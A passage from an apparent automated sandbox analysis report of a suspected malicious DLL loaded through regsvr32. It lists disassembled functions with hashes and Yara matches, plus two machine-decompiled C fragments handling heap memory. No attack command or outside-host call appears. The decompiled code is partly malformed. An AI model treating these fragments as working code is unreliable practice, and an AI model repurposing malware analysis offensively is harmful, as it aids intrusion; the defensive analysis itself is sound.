                                                                                                • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                                • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                                • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F597CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: S}
                                                                                                • API String ID: 0-4277866985
                                                                                                • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                                • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                                • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5BDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: H-
                                                                                                • API String ID: 0-1037293833
                                                                                                • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F596D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: u*AR
                                                                                                • API String ID: 0-611844632
                                                                                                • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4DBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: g*`
                                                                                                • API String ID: 0-1142845859
                                                                                                • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F492F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5$
                                                                                                • API String ID: 0-3756733592
                                                                                                • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5A6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: n*=
                                                                                                • API String ID: 0-1578461029
                                                                                                • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                0x18000a87c
                                                                                                0x18000a885
                                                                                                0x18000a893

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4B258 Relevance: .3, Instructions: 310COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                • Instruction ID: ade35c2a0381b9d626eb3f38822e61c6e34b7db0acea8ffdbf752e8b455ed19d
                                                                                                • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                • Instruction Fuzzy Hash: 7AE10570E0460ACFDF58DFA8D49A9AEBBB2FB44348F004159D806E72A0D7B49A15CBC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F41000 Relevance: .2, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                • Instruction ID: 8c51c8a8fff77e9d76a4083441efe9389b238b57fbef8b500ab4bf763c40cece
                                                                                                • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                • Instruction Fuzzy Hash: 4FC1CEB9903609CFDB68CF38C49A59D3BF1AF64308F204119EC269A2A6D774D529CB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5020C Relevance: .2, Instructions: 230COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                • Instruction ID: fefa66a1b90fa802e2975709714e37022283bd305edb0ea4ca20fb2a3f6cc5e2
                                                                                                • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                • Instruction Fuzzy Hash: E6B11570E04B089FDFA8CFA8D48A9DEBBF2FB44344F004519E846A7290D7B8541ADB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4BA2C Relevance: .2, Instructions: 192COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                • Instruction ID: 0003ff9d35628a8fca87c397f73db9b34ab83b3d8c51dbf2c7c49ce1165f3ef1
                                                                                                • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                • Instruction Fuzzy Hash: D8B1F7716087C88FDBBECF24C8892DA3BA9FB45708F504219EDCA8E254DB749745CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5D770 Relevance: .2, Instructions: 191COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                • Instruction ID: 124113779f55a6214a16fe4700ffc9823aeb8cbbdb01547d5848501d90628a66
                                                                                                • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                • Instruction Fuzzy Hash: 48814C70D48709EFCB58DFA8C49599EBBF1FB44344F00856EE849EB290DB749A09CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F627EC Relevance: .2, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                • Instruction ID: b3f5c45655cc8d5e8ef9424793abf69025d125d6ba6e8555c60b0c825c62c0da
                                                                                                • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                • Instruction Fuzzy Hash: D781067151074D9BCF88CF28C8C99DD7BB0FB483A8FA56218FC0AA6254D778D885CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F43ABC Relevance: .2, Instructions: 173COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                • Instruction ID: 641d634edd96660e6cac1e32f2d0086c161f83afc6606be24e6829f5d626f89d
                                                                                                • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                • Instruction Fuzzy Hash: 90612170A1464C8BDF2CDF78D4962AD3BE1FB44314F20613DEC669A2A6D774D90ACB44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5E310 Relevance: .1, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                • Instruction ID: 608a528a8df6c5a99b24e920b9bf38b04cda737a827493a8346bf13d65ee6966
                                                                                                • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                • Instruction Fuzzy Hash: F5710970508789CBDBF9CF24C8896DE7BE4FB88704F10461DE9998B2A0DB749649CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180007110 Relevance: .1, Instructions: 131COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F42C78 Relevance: .1, Instructions: 128COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                • Instruction ID: db62923c8b734c63de9883f7b743f2adf2acdfb02386a77fe2934a1ecf67413f
                                                                                                • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                • Instruction Fuzzy Hash: 6351E470518788CBDBBADF24C8996D97BB0FB58304F90861DD84E8E290DB785749DB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180006818 Relevance: .1, Instructions: 126COMMONLIBRARYCODECrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 56%
                                                                                                			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0xeaed15642a89
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0xeaed15642a89
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0xeaed15642a89
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0xeaed15642a89
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0xeaed15642a89
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}
























                                                                                                0x180006818
                                                                                                0x180006818
                                                                                                0x180006818
                                                                                                0x18000681d
                                                                                                0x180006822
                                                                                                0x180006830
                                                                                                0x180006835
                                                                                                0x180006838
                                                                                                0x18000683e
                                                                                                0x180006844
                                                                                                0x180006851
                                                                                                0x18000685a
                                                                                                0x180006864
                                                                                                0x180006868
                                                                                                0x18000686b
                                                                                                0x180006871
                                                                                                0x18000687f
                                                                                                0x180006889
                                                                                                0x18000688d
                                                                                                0x180006890
                                                                                                0x180006893
                                                                                                0x18000689a
                                                                                                0x18000689c
                                                                                                0x18000689c
                                                                                                0x1800068a6
                                                                                                0x1800068b0
                                                                                                0x1800068b8
                                                                                                0x1800068ba
                                                                                                0x1800068be
                                                                                                0x1800068ca
                                                                                                0x1800068d1
                                                                                                0x1800068d4
                                                                                                0x1800068dc
                                                                                                0x1800068e9
                                                                                                0x1800068ed
                                                                                                0x180006905
                                                                                                0x180006909
                                                                                                0x18000690c
                                                                                                0x180006914
                                                                                                0x180006917
                                                                                                0x18000691e
                                                                                                0x18000693d
                                                                                                0x180006943
                                                                                                0x180006946
                                                                                                0x180006959
                                                                                                0x180006962
                                                                                                0x180006968
                                                                                                0x180006979
                                                                                                0x180006982
                                                                                                0x180006986
                                                                                                0x180006992
                                                                                                0x18000699b
                                                                                                0x1800069a6
                                                                                                0x1800069aa
                                                                                                0x1800069c7

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 485612231-0
                                                                                                • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F490F8 Relevance: .1, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                • Instruction ID: f24b41d4118684462d941c8a2cda840d0365acf9bd6cb22d8bfe286461e14f32
                                                                                                • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                • Instruction Fuzzy Hash: E051B2B090474E8FDB48CF68D48A5DE7FB0FB68398F214619E81596250D7B4D6A5CFC0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4B83C Relevance: .1, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                • Instruction ID: 12be15f3218e1a311c8b4b91a87a5e15bab846c610b3e978c963e38bf5967b09
                                                                                                • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                • Instruction Fuzzy Hash: 455118719047498BDB48CF68C8895DEBFF1FB48318F11875CE89AA7260D7B89A44CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F55CC4 Relevance: .1, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                • Instruction ID: b7a0703f361886732f71c7965c3360842d4eaf8d1a0bfbc6031caca0e337ae78
                                                                                                • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                • Instruction Fuzzy Hash: A051B4B090038E8FDB88CF68D88A5CE7BF0FB58358F104619F865A6250D3B8D664CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F65450 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
